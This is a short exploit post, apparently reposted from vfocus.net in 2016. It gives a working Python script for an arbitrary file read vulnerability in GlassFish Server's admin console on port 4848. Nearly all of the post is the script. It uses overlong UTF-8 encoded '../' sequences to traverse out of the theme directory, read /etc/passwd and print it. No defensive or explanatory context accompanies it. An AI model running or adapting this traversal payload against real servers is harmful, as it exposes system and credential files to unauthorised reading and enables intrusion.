Glassfish Server - Arbitrary File Read Vulnerability
|
来源:vfocus.net 作者:bingbing 发布时间:2016-01-27
|
|
# Title: glassfish Arbitrary file read vulnerability # Date : 01/15/2016 # Author: bingbing # Software link: https://glassfish.java.net/download.html # Software: GlassFish Server # Tested: Windows 7 SP1 64bits #!/usr/bin/python import urllib2 response=urllib2.urlopen('http://localhost:4848/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd') s=response.read() print s
|
|
|
[推荐]
[评论(0条)]
[返回顶部] [打印本页]
[关闭窗口] |
|
|